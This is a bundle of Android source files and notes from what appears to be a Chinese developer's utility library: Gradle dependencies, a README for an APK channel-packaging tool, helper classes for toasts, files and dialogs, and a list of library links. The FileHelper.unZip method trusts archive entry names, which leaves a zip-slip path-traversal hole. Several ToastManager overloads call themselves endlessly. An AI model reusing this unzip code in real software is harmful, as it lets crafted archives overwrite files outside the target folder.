// compile 'me.imid.swipebacklayout.lib:library:1.0.0' // IOS 滑动返回
// compile 'com.moxun:tagcloudlib:1.0.3' // 3D 滚动标签视图
// compile 'io.github.yavski:fab-speed-dial:1.0.2' // FabActionButton 扩展
// compile 'com.github.edanel:GBSlideBar:0.5' // 滑杆选择器
// compile 'me.codeboy.android:align-text-view:2.3.0' // 文本排版
// compile 'de.hdodenhof:circleimageview:2.0.0' // 圆形图片
// compile 'com.github.badoualy:morphy-toolbar:1.0.3' // Toolbar 隐藏
// compile 'com.github.alorma:timelineview:2.2.1' // 时间轴
// 视频相关
// compile 'com.asha:vrlib:0.1' // 全景视频 黑科技
// compile 'com.github.danylovolokh:video-player-manager:0.2.0' // 滚动获取焦点播放
// compile 'com.github.danylovolokh:list-visibility-utils:0.2.0' // 滚动获取焦点播放
// compile 'com.github.eneim:Toro:1.1.0' // 滚动获取焦点播放
// Material Design 设计规范
// compile 'com.redbooth:SlidingDeck:1.0.0' // 卡片层叠
// compile 'com.github.DxTT:coolMenu:v1.2' // 卡片视图切换
// compile 'com.jaredrummler:material-spinner:1.0.4' // Spinner
debugCompile 'com.squareup.leakcanary:leakcanary-android:1.3'
releaseCompile 'com.squareup.leakcanary:leakcanary-android-no-op:1.3'
// Jar
// compile files('lib/mpermissions.jar') // http://www.cnblogs.com/avenwu/p/4173899.html 使用
compile files('lib/android-directionalviewpager-1.2.1fixed.jar')
}
<file_sep>AndroidMultiChannelBuildTool
============================
安卓多渠道打包工具。
实现思路讲解: [Android批量打包提速 - GavinCT](http://www.cnblogs.com/ct2011/p/4152323.html)
使用本工具,Android程序员仅需将ChannelUtil.java放入到工程里使用,以后打包的事情就不用自己动手了。
安装个Python环境,运行一下MultiChannelBuildTool.py,谁都可以打包了!
# 具体使用步骤
将想要批量打包的apk文件拷贝到PythonTool目录下(与py同级),运行py脚本即可打包完成。(生成的渠道apk包在output_** 目录下)
# 目录介绍及使用注意
## PythonTool
Python2 与 Python3 都能正常使用
- info目录下的channel用来存放渠道,多个渠道之间用换行隔开。
注意:
fork后通过Github clone,这个channel文件在Windows端是正常的,以换行隔开(`\r\n`)。
直接点击右侧的download下载zip,可能你在windows端看到的就不是以换行隔开的(`\n`)。
这是Github造成的。但不会影响程序最后的运行效果。
你可以粘贴下面的渠道到channel.txt中保持它在windows端的可读性。
```
samsungapps
hiapk
anzhi
360cn
xiaomi
myapp
91com
gfan
appchina
nduoa
3gcn
mumayi
10086com
wostore
189store
lenovomm
hicloud
meizu
baidu
googleplay
wandou
```
也可以自己来写入自己需要的市场,并以换行隔开
- MultiChannelBuildTool.py是多渠道打包的脚本。
## JavaUtil
ChannelUtil.java 用来解析渠道,直接拷贝到Android工程中使用即可。
ChannelUtil中的getChannel方法可以方便的获取渠道。
# 常见问题答疑
这部分问题是由美团大神<a href="http://weibo.com/coderdd" target="_blank" >丁志虎</a>在微博上答复的,摘录如下:
- 这个方案没法解决不同渠道使用渠道自己SDK的问题,友盟的SDK提供了在代码中设置渠道的方式,所以再获取到渠道号后再调用SDK相关设置渠道的方法就可以了
- apk用的是java那一套签名,放在META-INF文件夹里的文件原则上是不参与签名的。如果Google修改了apk的签名规则,这一套可能就不适用了。
# License
Copyright 2014 GavinCT
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
<file_sep>package com.icenler.lib.utils.manager;
import android.content.Context;
import android.os.Handler;
import android.view.View;
import android.widget.ImageView;
import android.widget.TextView;
import android.widget.Toast;
import com.icenler.lib.R;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
/**
* Created by iCenler - 2015/7/14.
* Description:自定义全局 Toast
* 1、可指定时间显示或常显(通过 cancle() 取消)
*/
public class ToastManager {
private static final int DEF_NO_ICON = 0;
private static final int DEF_FAILED_ICON = DEF_NO_ICON;
private static final int DEF_SUCCESS_ICON = DEF_NO_ICON;
private static boolean isShowing = false;
private static Toast mToast;
private ToastManager() {
throw new UnsupportedOperationException("cannot be instantiated");
}
/**
* 常规 Toast
*
* @param context
* @param msg
*/
public static void show(Context context, String msg) {
show(context, DEF_NO_ICON, msg);
}
public static void show(Context context, int strRes) {
show(context, context.getString(strRes));
}
/**
* 附带 Icon Toast
*
* @param context
* @param isError
* @param msg
*/
public static void show(Context context, boolean isError, String msg) {
show(context, isError ? DEF_FAILED_ICON : DEF_SUCCESS_ICON, msg);
}
public static void show(Context context, boolean isError, int strRes) {
show(context, isError, context.getString(strRes));
}
/**
* 指定图品资源显示 Toast
*
* @param context
* @param iconRes
* @param msg
*/
public static void show(Context context, int iconRes, String msg) {
Toast toast = new Toast(context);
toast.setView(getToastView(context, iconRes, msg));
toast.setDuration(Toast.LENGTH_SHORT);
toast.show();
}
public static void show(Context context, int iconRes, int strRes) {
show(context, iconRes, strRes);
}
/**
* @param context
* @param iconRes
* @param msg
* @return 自定义 Toast 布局样式
*/
private static View getToastView(Context context, int iconRes, String msg) {
View view = View.inflate(context, R.layout.toast_layout, null);
((TextView) view.findViewById(R.id.toast_message)).setText(msg);
if (iconRes != DEF_NO_ICON) {
((ImageView) view.findViewById(R.id.toast_icon)).setImageResource(iconRes);
} else {
view.findViewById(R.id.toast_icon).setVisibility(View.GONE);
}
return view;
}
/**
* 常显 Toast,可通过 cancel() 取消显示
*
* @param context
* @param message
*/
public static void showAlways(Context context, String message) {
if (isShow()) mToast.cancel();
Field mTNField = null;
try {
mTNField = Toast.class.getDeclaredField("mTN");
mTNField.setAccessible(true);
// Class clazz = Class.forName("android.widget.Toast");
// Constructor constructor = clazz.getConstructor(Context.class);
// constructor.newInstance(context);
Object mTN = mTNField.get(mToast = new Toast(context));
try {
// android 4.0以上系统要设置mT的mNextView属性
Field mNextViewField = mTN.getClass().getDeclaredField("mNextView");
mNextViewField.setAccessible(true);
mNextViewField.set(mTN, getToastView(context, DEF_NO_ICON, message));
} catch (NoSuchFieldException e) {
e.printStackTrace();
}
Method showMethod = mTN.getClass().getDeclaredMethod("show", new Class[]{});
showMethod.setAccessible(true);
showMethod.invoke(mTN, new Object[]{});
isShowing = true;
} catch (Exception e) {
e.printStackTrace();
}
}
public static void showAlways(Context context, int strRes) {
showAlways(context, strRes);
}
/**
* 指定显示时间 Toast
*
* @param context
* @param message
* @param delayMillis
*/
public static void show(Context context, String message, long delayMillis) {
showAlways(context, message);
new Handler().postDelayed(new Runnable() {
@Override
public void run() {
cancel();
}
}, delayMillis);
}
public static void show(Context context, int strRes, long delayMillis) {
show(context, strRes, delayMillis);
}
public static void cancel() {
if (mToast != null && isShow()) {
mToast.cancel();
isShowing = false;
}
}
/**
* @return 当前 Toast 是否显示,限于常显和指定时间模式
*/
public static boolean isShow() {
return isShowing;
}
}
<file_sep>package com.icenler.lib.utils;
import android.content.Context;
import android.graphics.Bitmap;
import android.os.AsyncTask;
import android.view.View;
import android.widget.ImageView;
import com.nostra13.universalimageloader.core.ImageLoader;
import com.nostra13.universalimageloader.core.assist.FailReason;
import com.nostra13.universalimageloader.core.listener.ImageLoadingListener;
/**
* Created by iCenler - 2015/9/11:
* Description:图品滤镜加载工具类
* 1、 高斯模糊
* 2、 ……
*/
public class ImageFilterLoaderUtil {
/**
* 高斯模糊显示图片 TODO 待完善测试
*
* @param context
* @param imageView
* @param url
*/
public static void loadingImage(final Context context, final ImageView imageView, String url) {
ImageLoader imageLoader = ImageLoader.getInstance();
imageLoader.displayImage(url, imageView, new ImageLoadingListener() {
@Override
public void onLoadingStarted(String imageUri, View view) {
}
@Override
public void onLoadingFailed(String imageUri, View view, FailReason failReason) {
}
@Override
public void onLoadingComplete(String imageUri, View view, Bitmap loadedImage) {
imageView.setImageBitmap(ImageUtil.blurBitmap(context, loadedImage, 0));
}
@Override
public void onLoadingCancelled(String imageUri, View view) {
}
});
}
static class BlurAsyncTask extends AsyncTask<Bitmap, Void, Bitmap> {
private Context mContext;
private ImageView mImageView;
private float mRadius = 10;
public BlurAsyncTask(String imageUri, ImageView imageView, Context context, float radius) {
this.mContext = context;
this.mImageView = imageView;
this.mRadius = radius;
}
@Override
protected Bitmap doInBackground(Bitmap... loadedImage) {
return ImageUtil.blurBitmap(mContext, loadedImage[0], mRadius);
}
@Override
protected void onPostExecute(Bitmap bitmap) {
mImageView.setImageBitmap(bitmap);
}
}
}
<file_sep>package com.icenler.lib.feature.mvp.base;
public interface BaseView {
}
<file_sep>package com.icenler.lib.utils;
import android.os.Environment;
import android.support.annotation.NonNull;
import android.text.TextUtils;
import com.icenler.lib.feature.App;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.Closeable;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.zip.Adler32;
import java.util.zip.CheckedInputStream;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import static com.icenler.lib.utils.Preconditions.checkNotNull;
/**
* Created by Cenler on 2015/11/3.
* Description:
*/
public class FileHelper {
private FileHelper() {
throw new UnsupportedOperationException("cannot be instantiated");
}
public static int DEFAULT_BUFFER_SIZE = 8192;
/**
* 递归删除文件及文件夹
*
* @param file
*/
public static boolean deleteAll(File file) {
if (file.isDirectory()) {
File[] childFiles = file.listFiles();
if (childFiles != null && childFiles.length > 0) {
for (int i = 0; i < childFiles.length; i++) {
deleteAll(childFiles[i]);
}
}
}
return file.delete();
}
/**
* @param originPath
* @param targetPath
* @return 解压文件
*/
public static boolean unZip(@NonNull String originPath, @NonNull String targetPath) {
checkNotNull(originPath);
return unZip(new File(originPath), targetPath);
}
public static boolean unZip(@NonNull File originFile, @NonNull String targetPath) {
checkNotNull(originFile);
try {
return unZip(new FileInputStream(originFile), targetPath);
} catch (FileNotFoundException e) {
LogUtil.e("Origin file not found: " + originFile.getAbsolutePath(), e);
return false;
}
}
public static boolean unZip(@NonNull InputStream originInputStream, @NonNull String targetPath) {
checkNotNull(originInputStream);
checkNotNull(targetPath);
CheckedInputStream checkedInputStream = new CheckedInputStream(originInputStream, new Adler32());
BufferedInputStream bufferedInputStream = new BufferedInputStream(checkedInputStream);
ZipInputStream zipInputStream = new ZipInputStream(bufferedInputStream);
byte[] buffer = new byte[DEFAULT_BUFFER_SIZE];
int length;
ZipEntry zipEntry;
try {
while ((zipEntry = zipInputStream.getNextEntry()) != null) {
File targetFile = new File(targetPath, zipEntry.getName());
LogUtil.d(targetFile.getAbsolutePath());
if (zipEntry.isDirectory()) {
targetFile.mkdirs();
} else {
File parentFile = targetFile.getParentFile();
if (!parentFile.exists()) {
parentFile.mkdirs();
}
FileOutputStream fos = null;
BufferedOutputStream bos = null;
try {
fos = new FileOutputStream(targetFile);
bos = new BufferedOutputStream(fos, buffer.length * 4);
while ((length = zipInputStream.read(buffer)) > 0) {
bos.write(buffer, 0, length);
}
bos.flush();
} catch (IOException e) {
LogUtil.e("unzip file fail", e);
} finally {
closeQuietly(bos);
closeQuietly(fos);
}
}
}
LogUtil.i("unzip file success. Checksum: " + checkedInputStream.getChecksum().getValue());
return true;
} catch (IOException e) {
LogUtil.e("unzip file damaged", e);
return false;
} finally {
closeQuietly(zipInputStream);
closeQuietly(bufferedInputStream);
closeQuietly(checkedInputStream);
closeQuietly(originInputStream);
}
}
/**
* 序列化文件对象读取
*
* @param targetPath
* @param fileName
* @return
*/
public static <T extends Object> T readObjectForDiskCache(String targetPath, String fileName) {
if (TextUtils.isEmpty(targetPath) || TextUtils.isEmpty(fileName))
return null;
Object obj = null;
File cacheFile;
FileInputStream fis = null;
ObjectInputStream ois = null;
try {
cacheFile = new File(targetPath, fileName);
fis = new FileInputStream(cacheFile);
ois = new ObjectInputStream(fis);
obj = ois.readObject();
} catch (Exception e) {
LogUtil.e("Error: ", e);
} finally {
closeQuietly(ois);
closeQuietly(fis);
}
return (T) obj;
}
/**
* 序列化对象文件存储
*
* @param targetPath
* @param fileName
* @param object
*/
public static boolean writeObjectForDiskCache(String targetPath, String fileName, Serializable object) {
if (TextUtils.isEmpty(targetPath) || TextUtils.isEmpty(fileName))
return false;
File targetDir;
File cacheFile;
FileOutputStream fos = null;
ObjectOutputStream oos = null;
try {
targetDir = new File(targetPath);
if (!targetDir.exists())
targetDir.mkdirs();
cacheFile = new File(targetDir, fileName);
// 若文件存在则删除
if (!cacheFile.createNewFile())
cacheFile.delete();
fos = new FileOutputStream(cacheFile);
oos = new ObjectOutputStream(fos);
oos.writeObject(object);
oos.flush();
return true;
} catch (IOException e) {
LogUtil.e("write object failed", e);
return false;
} finally {
closeQuietly(oos);
closeQuietly(fos);
}
}
/**
* 目录 or 文件复制
*
* @param originPath 来源目录
* @param targetPath 目标目录
*/
public static void copyFile(String originPath, String targetPath) {
if (TextUtils.isEmpty(originPath) || TextUtils.isEmpty(targetPath))
return;
File origin = new File(originPath);
File target = new File(targetPath);
if (!target.exists())
target.mkdirs();
if (origin.isDirectory()) {
// 目录操作
LogUtil.d("Copy folder"
+ " origin:" + originPath
+ " target:" + targetPath);
String[] fileList = origin.list();
for (int i = 0; i < fileList.length; i++) {
String childName = fileList[i];
String folderName = origin.getName();
copyFile(TextUtils.concat(originPath, File.separator, childName).toString()
, TextUtils.concat(targetPath, File.separator, folderName).toString());
}
} else {
// 文件操作
if (target.isDirectory() && target.canWrite()) {
byte[] buffer = new byte[DEFAULT_BUFFER_SIZE];
int length;
String filename = origin.getName();
FileInputStream fis = null;
FileOutputStream fos = null;
BufferedInputStream bis = null;
BufferedOutputStream bos = null;
try {
fis = new FileInputStream(originPath);
fos = new FileOutputStream(new File(targetPath, filename));
bis = new BufferedInputStream(fis);
bos = new BufferedOutputStream(fos);
while ((length = bis.read(buffer)) > 0) {
bos.write(buffer, 0, length);
}
bos.flush();
LogUtil.d("Copy file success"
+ " origin:" + originPath
+ " target:" + targetPath);
} catch (IOException e) {
LogUtil.e("Copy error:", e);
} finally {
closeQuietly(bos);
closeQuietly(bis);
closeQuietly(fos);
closeQuietly(fis);
}
}
}
}
/**
* 目录 or 文件删除
*
* @param targetPath
*/
public static void deleteFile(String targetPath) {
if (TextUtils.isEmpty(targetPath))
return;
File file = new File(targetPath);
if (file.exists()) {
if (file.isDirectory()) {
File[] files = file.listFiles();
if (file != null && files.length != 0) {
for (File f : files) {
deleteFile(f.getAbsolutePath());
}
}
}
file.delete();
LogUtil.d("Delete file:" + targetPath);
}
}
/**
* @param path 文件下载路径 or 文件路径
* @return 文件名称
*/
public static String getFileName(String path) {
if (TextUtils.isEmpty(path))
return null;
return path.substring(path.lastIndexOf(File.separator) + 1, path.length());
}
/**
* @param type {@link android.os.Environment#DIRECTORY_MUSIC},
* {@link android.os.Environment#DIRECTORY_PODCASTS},
* {@link android.os.Environment#DIRECTORY_RINGTONES},
* {@link android.os.Environment#DIRECTORY_ALARMS},
* {@link android.os.Environment#DIRECTORY_NOTIFICATIONS},
* {@link android.os.Environment#DIRECTORY_PICTURES},
* {@link android.os.Environment#DIRECTORY_MOVIES}
* @return 获取应用缓存目录
*/
public static String getFilesDirectory(String type) {
return getAppStorageDirectory(type);
}
public static String getCacheDirectory() {
return getAppStorageDirectory("cache");
}
private static String getAppStorageDirectory(String dirName) {
if (isSDCardEnable()) {
File file = App.getInstance().getExternalFilesDir(dirName);
if (null == file) {
// 特殊情况下为 null 处理
String cacheDir = TextUtils.concat(
Environment.getExternalStorageDirectory().getPath(), File.separator
, "Android", File.separator
, "data", File.separator
, App.getInstance().getPackageName(), File.separator
, dirName, File.separator).toString();
file = new File(cacheDir);
file.mkdirs();
}
return file.getAbsolutePath();
} else {
return dirName == null ?
App.getInstance().getFileStreamPath(dirName).getAbsolutePath() :
App.getInstance().getFilesDir().getAbsolutePath();
}
}
/**
* @return 判断SDCard是否可用
*/
public static boolean isSDCardEnable() {
return Environment.getExternalStorageState().equals(Environment.MEDIA_MOUNTED);
}
public static void closeQuietly(Closeable closeable) {
if (closeable != null) {
try {
closeable.close();
} catch (IOException e) {
}
}
}
}
<file_sep>/****************************************************************/
》 阅读:
- http://blog.csdn.net/singwhatiwanna/article/details/49560409
》 图形字体库:
Font Awesome:
- http://www.bootcss.com/p/font-awesome/#icons-new
- https://github.com/liltof/font-awsome-for-android
》 优秀开源资源学习借鉴:
- https://github.com/Trinea/android-open-project // 开源库整理
- https://github.com/zxing/zxing // 二维码扫描
- http://repo1.maven.org/maven2/com/google/zxing/
- https://github.com/sungerk/CircularMenu // 圆形菜单
- https://github.com/hdodenhof/CircleImageView // 圆形图片
- http://www.imooc.com/view/223 // 推送服务
- https://github.com/alorma/TimelineView // 时间轴
- https://github.com/code-mc/material-icon-lib // 文本图片
- http://blog.csdn.net/xu_fu/article/details/44004841 // SVG Drawable
- http://www.jianshu.com/p/167fd5f47d5c // 无权限弹窗
- https://github.com/liaohuqiu/android-UCToast
- https://github.com/Aspsine/MultiThreadDownload // 多线程下载
- https://github.com/AigeStudio/MultiThreadDownloader
- http://blog.csdn.net/zhaokaiqiang1992/article/details/43939279
- https://github.com/ssseasonnn/RxDownload
- https://git.oschina.net/hailongqiu/AndroidTVWidget/wikis/AndroidTVWidget-use-manual // TV 开发框架
- https://git.oschina.net/hailongqiu/AndroidTVWidget/wikis/Android-TV-%E5%A6%82%E4%BD%95%E4%BD%BF%E7%94%A8%E9%94%AE%E7%9B%98%E6%8E%A7%E4%BB%B6%28SkbContainer%29
- https://git.oschina.net/hailongqiu/AndroidTVWidget/wikis/AndroidTVWidget-use-manual%28Android-Studio%29
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0317/4059.html
- https://github.com/DevLight-Mobile-Agency/NavigationTabBar// 自定义TabBar
- https://github.com/sephiroth74/Material-BottomNavigation
- https://github.com/armcha/LuseenBottomNavigation
- https://github.com/saiff35/LivingTabs
- https://github.com/aurelhubert/ahbottomnavigation
- https://github.com/armcha/Space-Navigation-View
- https://github.com/borjabravo10/ReadMoreTextView // 折叠与展示文本控件
- https://github.com/freecats/TextViewExpandableAnimation // 文本折叠展开
- https://github.com/cachapa/ExpandableLayout // 折叠布局
- https://github.com/traex/ExpandableLayout
- https://github.com/zaihuishou/ExpandableRecyclerview
- https://github.com/kakajika/FragmentAnimations // Fragment 切换动画
- https://github.com/waynell/VideoListPlayer // 视频滑动播放
- https://github.com/supercwn/SuperPlayer // 视频播放器
- https://github.com/alphamu/AnimatedEditText // 输入文本动画
- http://www.jcodecraeer.com/a/opensource/2016/0510/4252.html // 气泡消息框
- http://www.jcodecraeer.com/a/opensource/2016/0509/4232.html // 自适应提示框
- http://www.jcodecraeer.com/a/opensource/2016/0510/4250.html // 仿 ISO 卡片视图
- https://github.com/Diolor/Swipecards
- https://github.com/prolificinteractive/swipe-action-layout // 防 ISO 下拉状态操作
- https://github.com/ashqal/ChromeLikeSwipeLayout
- https://github.com/klinker41/android-slidingactivity // 下拉返回
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0527/4302.html // WebP 图片
- https://github.com/Curzibn/Luban // 图片压缩
- https://github.com/oubowu/MarqueeLayoutLibrary // 自动混动视图
- https://github.com/venshine/GoodView // 点赞收藏特效
- https://github.com/UFreedom/FloatingText
- https://github.com/jd-alexander/LikeButton
- https://github.com/hanks-zyh/SmallBang
- http://www.jcodecraeer.com/a/opensource/2015/1224/3798.html
- https://github.com/ldoublem/LoadingView // 自定义Loading参考
- https://github.com/Rogero0o/CatLoadingView
- https://github.com/Ajian-studio/GAHonorClock
- https://github.com/Ajian-studio/GALeafLoading
- https://github.com/Ajian-studio/GABottleLoading
- https://github.com/Ajian-studio/GADownloading
- https://github.com/sfsheng0322/StickyHeaderListView // 筛选布局封装
- https://github.com/baiiu/DropDownMenu
- https://github.com/sungerk/DropDownLayout
- https://github.com/dongjunkun/DropDownMenu
- https://github.com/wuapnjie/PoiPhoto // 图片选择器
- https://github.com/pengjianbo/GalleryFinal
- https://github.com/crosswall/Android-PickPhotos
- https://github.com/sangcomz/FishBun
- https://github.com/TangXiaoLv/TelegramGallery
- https://github.com/BmobSnail/PhotoUploadView
- https://github.com/LuckSiege/PictureSelector
- https://github.com/zaaach/CityPicker // 城市列表定位
- https://github.com/androiddevelop/AlignTextView // 文本对齐
- https://github.com/andyxialm/SmoothCheckBox // CheckBox 动效
- https://github.com/wenmingvs/NotifyUtil // 消息通知
- https://github.com/whilu/AndroidTagView // Label 布局
- https://github.com/H07000223/FlycoLabelView
- https://github.com/yll2wcf/YLListView // 下拉视差动效
- https://github.com/EverythingMe/overscroll-decor // 阻尼回弹效果
- https://github.com/Narfss/ParallaxEverywhere // 滑动视差展示
- https://github.com/Frank-Zhu/PullZoomView
- https://github.com/kanytu/android-parallax-recyclerview
- https://github.com/z56402344/AnimTextView // 数字落入动效
- https://github.com/robinhood/ticker
- https://github.com/xujinyang/BiuEditText // 输入法动效
- https://github.com/alphamu/AnimatedEditText
- https://github.com/glomadrian/material-code-input
- https://github.com/florent37/MaterialTextField // 输入框交互
// 转场动画
- https://github.com/hehonghui/android-tech-frontier/tree/master/others/%E6%B7%B1%E5%85%A5%E6%B5%85%E5%87%BAAndroid%20%E6%96%B0%E7%89%B9%E6%80%A7-Transition-Part-1
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0711/4490.html
- https://github.com/Y-bao/PullRefreshView // 刷新加载
- https://github.com/dinuscxj/RecyclerRefreshLayout
- https://github.com/eoinfogarty/Onboarding // 引导页
- https://github.com/zuiwuyuan/WeChatPswKeyboard // 数字密码输入
- https://github.com/mychoices/Jgraph // 图表引擎
- https://github.com/qifengdeqingchen/SeatTable // 电影-选座购票
- https://github.com/ldoublem/FlightSeat // 飞机
- https://github.com/timehop/sticky-headers-recyclerview // 悬浮指示器
- https://github.com/oubowu/PinnedSectionItemDecoration/tree/master
- https://github.com/hackware1993/MagicIndicator
- https://github.com/huazhiyuan2008/RecyclerViewCardGallery // 画廊替换方案
- https://github.com/rubensousa/RecyclerViewSnap // V7 SnapHelper
- https://github.com/jinatonic/confetti // 粒子动画
- https://github.com/yipianfengye/android-adDialog // 广告弹窗
- https://github.com/pedant/sweet-alert-dialog // 提示弹窗
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0830/6578.html // 开源项目进阶
- https://github.com/ryanhoo/StylishMusicPlayer // 音乐播放器
- https://github.com/Chacojack/HiveLayoutManager // RecyclerViewManager 蜂窝布局
- https://github.com/kHRYSTAL/CircleRecyclerView // 弧形布局
- https://github.com/mcxtzhang/ZLayoutManager // 卡片层叠视图
- https://github.com/RomainPiel/Shimmer-android // 闪烁控件
- https://github.com/facebook/shimmer-android
- https://github.com/daimajia/AndroidImageSlider // ViewPager 切换动画
- https://github.com/ToxicBakery/ViewPagerTransforms
- https://github.com/xgc1986/ParallaxPagerTransformer
- https://github.com/fccaikai/AutoScrollViewPager // 轮播图
- https://github.com/ozodrukh/CircularReveal // 点击波纹
- https://github.com/traex/RippleEffect
- https://github.com/HomHomLin/SlidingLayout // WebView 版权下拉展示
- https://github.com/xmuSistone/android-page-transition // 卡片画廊
- https://github.com/dongjunkun/CouponView // 优惠券组件
- https://github.com/sfsheng0322/MarqueeView // 公告栏组件
- https://github.com/Bilibili/DanmakuFlameMaster/issues // 弹幕框架
- https://github.com/laobie/NineGridImageView // 九宫格图片适配
- https://github.com/panyiho/NineGridView
- https://github.com/w4lle/NineGridView
- https://github.com/KevinMbg/NineImageViews
- https://github.com/jeasonlzy/NineGridView
- https://github.com/chrisbanes/PhotoView
- https://github.com/githubwing/DragPhotoView // 照片预览滑动退出
- https://github.com/zhengken/LyricViewDemo // 歌词同步
- https://github.com/codbking/CalendarExaple // 日历组件
- https://github.com/YoKeyword/Fragmentation // Fragments 框架
》 Intent 整理:
- http://blog.csdn.net/playboyanta123/article/details/7913679
》 蓝牙开发:
- http://www.jcodecraeer.com/a/anzhuokaifa/androidkaifa/2016/0128/3918.html
》 待办事项
- http://blog.csdn.net/sinyu890807/article/list/1
- http://www.apkbus.com/forum.php?mod=viewthread&tid=247787
- http://www.apkbus.com/forum.php?mod=viewthread&tid=247783
http://www.jianshu.com/p/e711e22e053e
http://www.jianshu.com/p/03fdcfd3ae9c
http://blog.csdn.net/guolin_blog?viewmode=contents
- 热补丁框架
- https://github.com/alibaba/dexposed
- https://github.com/alibaba/AndFix
- https://github.com/Tencent/tinker
- http://bugly.qq.com/blog/?p=781
CardView android:foreground="?attr/selectableItemBackground" Ripple
<?xml version="1.0" encoding="utf-8"?>
<selector xmlns:android="http://schemas.android.com/apk/res/android">
<item android:state_enabled="true" android:state_pressed="true">
<objectAnimator
android:duration="@android:integer/config_shortAnimTime"
android:propertyName="translationZ"
android:valueTo="@dimen/touch_raise"
android:valueType="floatType" />
</item>
<item>
<objectAnimator
android:duration="@android:integer/config_shortAnimTime"
android:propertyName="translationZ"
android:valueTo="0dp"
android:valueType="floatType" />
</item>
</selector>
android:stateListAnimator="@anim/touch_raise"<file_sep>package com.icenler.lib.view.dialog;
import android.app.DialogFragment;
import android.app.FragmentManager;
/**
* Created by iCenler - 2015/9/13:
* Description:简单加载 DialogFragment
*/
public class SimpleProgressDialog {
private static DialogFragment mDialog;
public static DialogFragment getDialog() {
return mDialog;
}
/**
* 显示加载框
*/
public static void show(FragmentManager fm) {
try {
if (mDialog == null || !mDialog.isVisible()) {
mDialog = CustomLoadingView.createDialog();
mDialog.show(fm, "Simple_Loading_Dialog");
}
} catch (Exception e) {
mDialog = null;
}
}
/**
* 取消显示
*/
public static void dismiss() {
try {
if (mDialog != null) {
mDialog.dismiss();
}
mDialog = null;
} catch (Exception e) {
mDialog = null;
}
}
}
<file_sep>package com.icenler.lib.feature.base;
import android.app.Dialog;
import android.content.DialogInterface;
import android.os.Bundle;
import android.support.annotation.LayoutRes;
import android.support.v4.app.DialogFragment;
import android.view.Gravity;
import android.view.LayoutInflater;
import android.view.View;
import android.view.Window;
import android.view.WindowManager;
import com.icenler.lib.R;
/**
* Description: 应用弹窗组件基类, 通过继承使用, 并重写特定方法进行如下配置
* 1. 应用主题 getDialogTheme()
* 2. 是否自动隐藏, 默认 Yes isCancelable()
* 3. 是否可以返回隐藏, 默认 Yes isCanceledOnTouchOutside()
* 4. 窗口位置设置, 默认 居中 getGravity() (ref: Gravity)
* 5. 窗口类型 (ref: WindowManager.LayoutParams.TYPE_xxx)
* 6. 窗口宽度 默认 wrap_content
* 7. 窗口高度 默认 wrap_content
*/
public abstract class BaseDialogFragment extends DialogFragment {
@LayoutRes
protected abstract int doGetLayoutResId();
protected abstract void doInit(View root);
protected void doInitData() {
}
public void setOnDismissListener(DialogInterface.OnDismissListener onDialogDismissListener) {
this.mDismissListener = onDialogDismissListener;
}
private DialogInterface.OnDismissListener mDismissListener;
@Override
public Dialog onCreateDialog(Bundle savedInstanceState) {
Dialog dialog = new Dialog(getActivity(), getDialogTheme());
View root = LayoutInflater.from(getActivity()).inflate(doGetLayoutResId(), null);
dialog.setCancelable(isCancelable());
dialog.setCanceledOnTouchOutside(isCanceledOnTouchOutside());
dialog.setContentView(root);
Window window = dialog.getWindow();
WindowManager.LayoutParams layoutParams = window.getAttributes();
layoutParams.width = getDefaultWidth();
layoutParams.height = getDefaultHeight();
window.setGravity(getGravity());
window.setAttributes(layoutParams);
window.setType(getWindowType());
// window.setSoftInputMode(WindowManager.LayoutParams.SOFT_INPUT_STATE_HIDDEN);
doInit(root);
return dialog;
}
@Override
public void onActivityCreated(Bundle savedInstanceState) {
super.onActivityCreated(savedInstanceState);
doInitData();
}
/**
* 弹窗主题
*/
protected int getDialogTheme() {
return R.style.BaseDialog;
}
/**
* 窗口外点击是否隐藏
*/
protected boolean isCanceledOnTouchOutside() {
return true;
}
/**
* 窗口位置
*/
protected int getGravity() {
return Gravity.CENTER;
}
/**
* 窗口类型
*/
protected int getWindowType() {
return WindowManager.LayoutParams.TYPE_APPLICATION;
}
/**
* 窗口宽度
*/
protected int getDefaultWidth() {
return WindowManager.LayoutParams.WRAP_CONTENT;
}
/**
* 窗口高度
*/
protected int getDefaultHeight() {
return WindowManager.LayoutParams.WRAP_CONTENT;
}
@Override
public void onDismiss(DialogInterface dialog) {
super.onDismiss(dialog);
if (mDismissListener != null)
mDismissListener.onDismiss(dialog);
}
@Override
public void onCancel(DialogInterface dialog) {
super.onCancel(dialog);
if (mDismissListener != null)
mDismissListener.onDismiss(dialog);
}
}
<file_sep>package com.icenler.lib.feature.base;
import android.os.Bundle;
import android.support.annotation.LayoutRes;
import android.support.annotation.Nullable;
import android.support.v4.app.Fragment;
import android.support.v4.app.FragmentManager;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import com.icenler.lib.utils.LogUtil;
import java.util.List;
public abstract class PagerFragment extends Fragment {
protected View mRootView;
@LayoutRes
protected abstract int doGetContentLayout();
protected abstract void doInit(View root);
/**
* ViewPager 正常预加载逻辑
*/
protected void doLoadData() {
LogUtil.e(toString());
}
/**
* ViewPager 懒加载
*/
protected void doLazyLoadData() {
LogUtil.e(toString());
}
/**
* [onHiddenChanged() + onResume()/onPause() + setUserVisibleHint()]
*/
protected void onVisible() {
LogUtil.e(toString());
}
/**
* [onHiddenChanged() + onResume()/onPause() +serVisibleHint()]
*/
protected void onInvisible() {
LogUtil.e(toString());
}
private boolean mIsSupportVisible;
private boolean mNeedDispatch = true;
private boolean mInvisibleWhenLeave;
private boolean mIsFirstVisible = true;
